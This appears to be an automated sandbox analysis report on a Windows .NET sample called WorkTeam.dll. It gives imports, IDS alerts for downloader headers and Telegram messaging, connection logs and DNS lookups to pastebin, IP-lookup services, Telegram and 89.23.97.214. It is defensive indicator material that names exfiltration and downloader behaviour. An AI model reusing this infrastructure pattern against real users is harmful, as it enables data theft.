LoadLibraryA, GetCurrentDirectoryW, IsWow64Process, EncodePointer, DecodePointer, CreateFileMappingA, TlsSetValue, TlsGetValue, GetSystemInfo, GetCurrentProcess, OutputDebugStringW, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, WideCharToMultiByte, GetCommandLineW, GetProcAddress, GetModuleHandleExW, SetThreadErrorMode, FlushProcessWriteBuffers, SetLastError, DebugBreak, WaitForSingleObject, GetNumaHighestNodeNumber, SetThreadAffinityMask, SetThreadIdealProcessorEx, GetThreadIdealProcessorEx, VirtualAllocExNuma, GetNumaProcessorNodeEx, VirtualUnlock, GetLargePageMinimum, IsProcessInJob, K32GetProcessMemoryInfo, GetLogicalProcessorInformation, GlobalMemoryStatusEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, RtlVirtualUnwind, IsProcessorFeaturePresent, RtlUnwindEx, InitializeCriticalSectionAndSpinCount, TlsFree, RtlPcToFileHeader, TryAcquireSRWLockExclusive, GetExitCodeThread, GetStringTypeW, InitializeCriticalSectionEx, GetLastError, CreateFileMappingW
ADVAPI32.dll | ReportEventW, AdjustTokenPrivileges, RegGetValueW, SetKernelObjectSecurity, GetSidSubAuthorityCount, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, DeregisterEventSource, RegisterEventSourceW, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, EventRegister, SetThreadToken, RevertToSelf, OpenThreadToken, EventWriteTransfer, EventWrite, LookupPrivilegeValueW
ole32.dll | CreateStreamOnHGlobal, CoRevokeInitializeSpy, CoGetClassObject, CoGetContextToken, CoGetObjectContext, CoUnmarshalInterface, CoMarshalInterface, CoGetMarshalSizeMax, CLSIDFromProgID, CoReleaseMarshalData, CoTaskMemFree, CoTaskMemAlloc, CoCreateGuid, CoInitializeEx, CoRegisterInitializeSpy, CoWaitForMultipleHandles, CoUninitialize, CoCreateFreeThreadedMarshaler
OLEAUT32.dll | CreateErrorInfo, SysFreeString, GetErrorInfo, SetErrorInfo, SysStringLen, SysAllocString, SysAllocStringLen, SafeArrayGetDim, SafeArrayGetLBound, SafeArrayDestroy, QueryPathOfRegTypeLib, LoadTypeLibEx, SafeArrayGetVartype, VariantChangeType, VariantChangeTypeEx, VariantClear, VariantInit, VarCyFromDec, SafeArrayAllocDescriptorEx, GetRecordInfoFromTypeInfo, SafeArraySetRecordInfo, SafeArrayAllocData, SafeArrayGetElemsize, SysStringByteLen, SysAllocStringByteLen, SafeArrayCreateVector, SafeArrayPutElement, LoadRegTypeLib
USER32.dll | LoadStringW, MessageBoxW
SHELL32.dll | ShellExecuteW
api-ms-win-crt-string-l1-1-0.dll | strncat_s, wcsncat_s, strcmp, wcsnlen, wcscat_s, towupper, iswascii, _strdup, strncpy, strnlen, wcstok_s, isdigit, isupper, isalpha, towlower, _wcsdup, iswspace, isspace, islower, strtok_s, _wcsnicmp, strcspn, __strncnt, strlen, wcscpy_s, toupper, wcsncpy_s, strcpy_s, strcat_s, strncpy_s, _strnicmp, tolower, wcsncmp, iswupper, strncmp, _stricmp, _wcsicmp
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsscanf, fflush, __acrt_iob_func, __stdio_common_vfprintf, __stdio_common_vswprintf, __stdio_common_vfwprintf, fputws, fputwc, _get_stream_buffer_pointers, _fseeki64, fread, fsetpos, ungetc, fgetpos, fgets, fgetc, fputc, _wfsopen, _wfopen, __p__commode, _set_fmode, __stdio_common_vsnprintf_s, setvbuf, _setmode, _dup, _fileno, ftell, fseek, fputs, __stdio_common_vsnwprintf_s, __stdio_common_vsprintf_s, fwrite, _flushall, fopen, fclose
api-ms-win-crt-runtime-l1-1-0.dll | _crt_atexit, _cexit, _seh_filter_exe, _set_app_type, _register_onexit_function, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, _initterm, _initterm_e, _exit, _invalid_parameter_noinfo_noreturn, __p___argc, __p___wargv, _c_exit, _register_thread_local_exe_atexit_callback, _initialize_onexit_table, _beginthreadex, terminate, _controlfp_s, _wcserror_s, _invalid_parameter_noinfo, _errno, exit, abort
api-ms-win-crt-convert-l1-1-0.dll | _atoi64, _ltow_s, _wtoi, strtoul, _wcstoui64, atol, _itow_s, strtoull, wcstoul
api-ms-win-crt-heap-l1-1-0.dll | free, _set_new_mode, calloc, malloc, realloc
api-ms-win-crt-utility-l1-1-0.dll | qsort
api-ms-win-crt-math-l1-1-0.dll | asinhf, atanhf, cbrtf, acoshf, cosh, cbrt, coshf, exp, expf, acosh, atanh, floor, floorf, fma, fmaf, cosf, _fdopen, cos, ceilf, _copysignf, _isnanf, trunc, truncf, ilogb, ilogbf, tanhf, ceil, fmod, fmodf, atanf, frexp, atan2f, atan2, log, log10, log10f, atan, asinf, log2, log2f, logf, pow, powf, sin, sinf, asin, sinh, sinhf, sqrt, sqrtf, tan, tanf, tanh, acosf, _copysign, asinh, _isnan, _finite, modf, modff, acos, __setusermatherr
                                                                                                                                                                                      api-ms-win-crt-time-l1-1-0.dll_time64, _gmtime64_s, wcsftime
                                                                                                                                                                                      api-ms-win-crt-environment-l1-1-0.dllgetenv
                                                                                                                                                                                      api-ms-win-crt-locale-l1-1-0.dll_unlock_locales, setlocale, __pctype_func, ___lc_locale_name_func, _lock_locales, ___lc_codepage_func, ___mb_cur_max_func, _configthreadlocale, localeconv
                                                                                                                                                                                      api-ms-win-crt-filesystem-l1-1-0.dll_wrename, _unlock_file, _wremove, _lock_file
Name | Ordinal | Address
---- | ------- | -------
CLRJitAttachState | 3 | 0x1407af270
DotNetRuntimeInfo | 4 | 0x14079c5d0
MetaDataGetDispenser | 5 | 0x140571160
g_CLREngineMetrics | 2 | 0x14079bdd8
g_dacTable | 6 | 0x140644600
Description | Data
----------- | ----
Translation | 0x0000 0x04b0
CompanyName | WorkTeam
FileDescription | WorkTeam
FileVersion | 1.0.0.0
InternalName | WorkTeam.dll
LegalCopyright |
OriginalFilename | WorkTeam.dll
ProductName | WorkTeam
ProductVersion | 1.0.0
Assembly Version | 1.0.0.0
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
--------- | --- | --------- | -------- | --------- | ----------- | ------- | --------- | --------
2025-02-17T18:57:13.834460+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.5 | 49704 | 172.67.19.24 | 443 | TCP
2025-02-17T18:57:28.713715+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49714 | 172.67.74.152 | 80 | TCP
2025-02-17T18:57:29.182389+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49720 | 208.95.112.1 | 80 | TCP
2025-02-17T18:57:32.313996+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49726 | 149.154.167.220 | 443 | TCP
2025-02-17T18:57:32.313996+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 49726 | 149.154.167.220 | 443 | TCP
2025-02-17T18:57:54.801700+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 60791 | 89.23.97.214 | 80 | TCP
2025-02-17T18:57:54.802006+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 60792 | 89.23.97.214 | 80 | TCP
2025-02-17T18:58:16.186836+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 59672 | 89.23.97.214 | 80 | TCP
2025-02-17T18:58:16.191757+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 59671 | 89.23.97.214 | 80 | TCP
2025-02-17T18:58:37.606294+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 59787 | 89.23.97.214 | 80 | TCP
2025-02-17T18:58:37.609819+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 59786 | 89.23.97.214 | 80 | TCP
2025-02-17T18:58:59.015165+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 59788 | 89.23.97.214 | 80 | TCP
2025-02-17T18:58:59.030826+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 59789 | 89.23.97.214 | 80 | TCP
2025-02-17T18:58:59.697743+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 59791 | 149.154.167.220 | 443 | TCP
2025-02-17T18:58:59.702364+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 59790 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
--------- | ----------- | --------- | --------- | -------
Feb 17, 2025 18:57:13.077548027 CET | 49704 | 443 | 192.168.2.5 | 172.67.19.24
Feb 17, 2025 18:57:13.077619076 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.077897072 CET | 49704 | 443 | 192.168.2.5 | 172.67.19.24
Feb 17, 2025 18:57:13.094769001 CET | 49704 | 443 | 192.168.2.5 | 172.67.19.24
Feb 17, 2025 18:57:13.094818115 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.618489027 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.618603945 CET | 49704 | 443 | 192.168.2.5 | 172.67.19.24
Feb 17, 2025 18:57:13.639906883 CET | 49704 | 443 | 192.168.2.5 | 172.67.19.24
Feb 17, 2025 18:57:13.639951944 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.640913010 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.656120062 CET | 49704 | 443 | 192.168.2.5 | 172.67.19.24
Feb 17, 2025 18:57:13.699332952 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.834434986 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.834469080 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.834487915 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.834503889 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.834522009 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.834527016 CET | 49704 | 443 | 192.168.2.5 | 172.67.19.24
Feb 17, 2025 18:57:13.834573030 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.834605932 CET | 49704 | 443 | 192.168.2.5 | 172.67.19.24
Feb 17, 2025 18:57:13.834630966 CET | 49704 | 443 | 192.168.2.5 | 172.67.19.24
Feb 17, 2025 18:57:13.834635973 CET | 443 | 49704 | 172.67.19.24 | 192.168.2.5
Feb 17, 2025 18:57:13.834681034 CET | 49704 | 443 | 192.168.2.5 | 172.67.19.24
Feb 17, 2025 18:57:13.872029066 CET | 49704 | 443 | 192.168.2.5 | 172.67.19.24
Feb 17, 2025 18:57:28.110913992 CET | 49714 | 80 | 192.168.2.5 | 172.67.74.152
Feb 17, 2025 18:57:28.115839005 CET | 80 | 49714 | 172.67.74.152 | 192.168.2.5
Feb 17, 2025 18:57:28.115940094 CET | 49714 | 80 | 192.168.2.5 | 172.67.74.152
Feb 17, 2025 18:57:28.128469944 CET | 49714 | 80 | 192.168.2.5 | 172.67.74.152
Feb 17, 2025 18:57:28.133394957 CET | 80 | 49714 | 172.67.74.152 | 192.168.2.5
Feb 17, 2025 18:57:28.598639965 CET | 80 | 49714 | 172.67.74.152 | 192.168.2.5
Feb 17, 2025 18:57:28.623639107 CET | 49720 | 80 | 192.168.2.5 | 208.95.112.1
Feb 17, 2025 18:57:28.628510952 CET | 80 | 49720 | 208.95.112.1 | 192.168.2.5
Feb 17, 2025 18:57:28.628601074 CET | 49720 | 80 | 192.168.2.5 | 208.95.112.1
Feb 17, 2025 18:57:28.628977060 CET | 49720 | 80 | 192.168.2.5 | 208.95.112.1
Feb 17, 2025 18:57:28.633802891 CET | 80 | 49720 | 208.95.112.1 | 192.168.2.5
Feb 17, 2025 18:57:28.713715076 CET | 49714 | 80 | 192.168.2.5 | 172.67.74.152
Feb 17, 2025 18:57:29.109947920 CET | 80 | 49720 | 208.95.112.1 | 192.168.2.5
Feb 17, 2025 18:57:29.182389021 CET | 49720 | 80 | 192.168.2.5 | 208.95.112.1
Feb 17, 2025 18:57:30.320305109 CET | 49726 | 443 | 192.168.2.5 | 149.154.167.220
Feb 17, 2025 18:57:30.320396900 CET | 443 | 49726 | 149.154.167.220 | 192.168.2.5
Feb 17, 2025 18:57:30.320477962 CET | 49726 | 443 | 192.168.2.5 | 149.154.167.220
Feb 17, 2025 18:57:30.352426052 CET | 49726 | 443 | 192.168.2.5 | 149.154.167.220
Feb 17, 2025 18:57:30.352473974 CET | 443 | 49726 | 149.154.167.220 | 192.168.2.5
Feb 17, 2025 18:57:31.038124084 CET | 443 | 49726 | 149.154.167.220 | 192.168.2.5
Feb 17, 2025 18:57:31.038211107 CET | 49726 | 443 | 192.168.2.5 | 149.154.167.220
Feb 17, 2025 18:57:31.052067041 CET | 49726 | 443 | 192.168.2.5 | 149.154.167.220
Feb 17, 2025 18:57:31.052100897 CET | 443 | 49726 | 149.154.167.220 | 192.168.2.5
Feb 17, 2025 18:57:31.052619934 CET | 443 | 49726 | 149.154.167.220 | 192.168.2.5
Feb 17, 2025 18:57:31.100770950 CET | 49726 | 443 | 192.168.2.5 | 149.154.167.220
Feb 17, 2025 18:57:31.143371105 CET | 443 | 49726 | 149.154.167.220 | 192.168.2.5
Feb 17, 2025 18:57:32.158756018 CET | 60779 | 53 | 192.168.2.5 | 1.1.1.1
Feb 17, 2025 18:57:32.163562059 CET | 53 | 60779 | 1.1.1.1 | 192.168.2.5
Feb 17, 2025 18:57:32.163635969 CET | 60779 | 53 | 192.168.2.5 | 1.1.1.1
Feb 17, 2025 18:57:32.168524027 CET | 53 | 60779 | 1.1.1.1 | 192.168.2.5
Feb 17, 2025 18:57:32.313852072 CET | 443 | 49726 | 149.154.167.220 | 192.168.2.5
Feb 17, 2025 18:57:32.313926935 CET | 443 | 49726 | 149.154.167.220 | 192.168.2.5
Feb 17, 2025 18:57:32.313990116 CET | 49726 | 443 | 192.168.2.5 | 149.154.167.220
Feb 17, 2025 18:57:32.315993071 CET | 49726 | 443 | 192.168.2.5 | 149.154.167.220
Feb 17, 2025 18:57:32.316040039 CET | 443 | 49726 | 149.154.167.220 | 192.168.2.5
Feb 17, 2025 18:57:32.764226913 CET | 60779 | 53 | 192.168.2.5 | 1.1.1.1
Feb 17, 2025 18:57:32.770169020 CET | 53 | 60779 | 1.1.1.1 | 192.168.2.5
Feb 17, 2025 18:57:32.770308971 CET | 60779 | 53 | 192.168.2.5 | 1.1.1.1
Feb 17, 2025 18:57:33.328665018 CET | 60791 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:33.329040051 CET | 60792 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:33.334877014 CET | 80 | 60791 | 89.23.97.214 | 192.168.2.5
Feb 17, 2025 18:57:33.334950924 CET | 60791 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:33.335258961 CET | 60791 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:33.336530924 CET | 80 | 60792 | 89.23.97.214 | 192.168.2.5
Feb 17, 2025 18:57:33.336596966 CET | 60792 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:33.336797953 CET | 60792 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:33.342164993 CET | 80 | 60791 | 89.23.97.214 | 192.168.2.5
Feb 17, 2025 18:57:33.344069004 CET | 80 | 60792 | 89.23.97.214 | 192.168.2.5
Feb 17, 2025 18:57:33.768086910 CET | 59545 | 53 | 192.168.2.5 | 1.1.1.1
Feb 17, 2025 18:57:33.772900105 CET | 53 | 59545 | 1.1.1.1 | 192.168.2.5
Feb 17, 2025 18:57:33.772969007 CET | 59545 | 53 | 192.168.2.5 | 1.1.1.1
Feb 17, 2025 18:57:33.777811050 CET | 53 | 59545 | 1.1.1.1 | 192.168.2.5
Feb 17, 2025 18:57:34.285669088 CET | 59545 | 53 | 192.168.2.5 | 1.1.1.1
Feb 17, 2025 18:57:34.290774107 CET | 53 | 59545 | 1.1.1.1 | 192.168.2.5
Feb 17, 2025 18:57:34.290833950 CET | 59545 | 53 | 192.168.2.5 | 1.1.1.1
Feb 17, 2025 18:57:54.801604033 CET | 80 | 60791 | 89.23.97.214 | 192.168.2.5
Feb 17, 2025 18:57:54.801642895 CET | 80 | 60792 | 89.23.97.214 | 192.168.2.5
Feb 17, 2025 18:57:54.801700115 CET | 60791 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:54.802006006 CET | 60792 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:54.804536104 CET | 60791 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:54.805320024 CET | 60792 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:54.805614948 CET | 59671 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:54.805763006 CET | 59672 | 80 | 192.168.2.5 | 89.23.97.214
Feb 17, 2025 18:57:54.809329987 CET | 80 | 60791 | 89.23.97.214 | 192.168.2.5
Feb 17, 2025 18:57:54.810070992 CET | 80 | 60792 | 89.23.97.214 | 192.168.2.5
Feb 17, 2025 18:57:54.810381889 CET | 80 | 59671 | 89.23.97.214 | 192.168.2.5
Feb 17, 2025 18:57:54.810445070 CET | 59671 | 80 | 192.168.2.5 | 89.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810514927 CET805967289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810564041 CET5967280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810682058 CET5967280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810683012 CET5967180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:57:54.815433025 CET805967289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:54.815486908 CET805967189.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:14.752540112 CET8049720208.95.112.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:14.752621889 CET4972080192.168.2.5208.95.112.1
                                                                                                                                                                                      Feb 17, 2025 18:58:16.186717987 CET805967289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.186836004 CET5967280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.187205076 CET5967280192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.188013077 CET5978680192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.191678047 CET805967189.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.191756964 CET5967180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.191966057 CET5967180192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.192079067 CET805967289.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.192477942 CET5978780192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.192950010 CET805978689.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.193022013 CET5978680192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.193226099 CET5978680192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.196753979 CET805967189.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.197408915 CET805978789.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.197491884 CET5978780192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.197654009 CET5978780192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:16.197993994 CET805978689.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:16.202594995 CET805978789.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:28.620762110 CET4972080192.168.2.5208.95.112.1
                                                                                                                                                                                      Feb 17, 2025 18:58:28.625540972 CET8049720208.95.112.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.606136084 CET805978789.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.606293917 CET5978780192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.606606007 CET5978780192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.607273102 CET5978880192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.609744072 CET805978689.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.609818935 CET5978680192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.610049963 CET5978680192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.610476971 CET5978980192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.611358881 CET805978789.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.612328053 CET805978889.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.612426996 CET5978880192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.612598896 CET5978880192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.614814043 CET805978689.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.615331888 CET805978989.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.615536928 CET5978980192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.615700960 CET5978980192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.617357969 CET805978889.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.620515108 CET805978989.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:42.948951960 CET4971480192.168.2.5172.67.74.152
                                                                                                                                                                                      Feb 17, 2025 18:58:42.953900099 CET8049714172.67.74.152192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:42.953980923 CET4971480192.168.2.5172.67.74.152
                                                                                                                                                                                      Feb 17, 2025 18:58:59.015064001 CET805978889.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.015165091 CET5978880192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:59.015374899 CET5978880192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:59.020131111 CET805978889.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.025996923 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.026113033 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.026199102 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.028078079 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.028115034 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.030762911 CET805978989.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.030826092 CET5978980192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:59.030932903 CET5978980192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:59.032056093 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.032087088 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.032145977 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.032332897 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.032346964 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.035706043 CET805978989.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.642360926 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.648015976 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.648032904 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.653871059 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.697560072 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.697575092 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.698028088 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.698123932 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.702140093 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.702157974 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.981281996 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.981362104 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.981417894 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.981822968 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.981841087 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:59:00.031507969 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:59:00.031589985 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:59:00.031713963 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:59:00.031963110 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:59:00.031984091 CET44359790149.154.167.220192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 17, 2025 18:57:13.055994034 CET | 192.168.2.5 | 1.1.1.1 | 0xc29b | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:57:27.955296040 CET | 192.168.2.5 | 1.1.1.1 | 0x909c | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:57:28.615974903 CET | 192.168.2.5 | 1.1.1.1 | 0xd378 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:57:29.327328920 CET | 192.168.2.5 | 1.1.1.1 | 0x14c8 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:58:59.018532991 CET | 192.168.2.5 | 1.1.1.1 | 0xa65 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 17, 2025 18:57:13.062864065 CET | 1.1.1.1 | 192.168.2.5 | 0xc29b | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:57:13.062864065 CET | 1.1.1.1 | 192.168.2.5 | 0xc29b | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:57:13.062864065 CET | 1.1.1.1 | 192.168.2.5 | 0xc29b | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:57:28.085192919 CET | 1.1.1.1 | 192.168.2.5 | 0x909c | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:57:28.085192919 CET | 1.1.1.1 | 192.168.2.5 | 0x909c | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:57:28.085192919 CET | 1.1.1.1 | 192.168.2.5 | 0x909c | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:57:28.622988939 CET | 1.1.1.1 | 192.168.2.5 | 0xd378 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:57:30.317960024 CET | 1.1.1.1 | 192.168.2.5 | 0x14c8 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 18:58:59.025162935 CET | 1.1.1.1 | 192.168.2.5 | 0xa65 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• pastebin.com
• api.telegram.org
• api.ipify.org
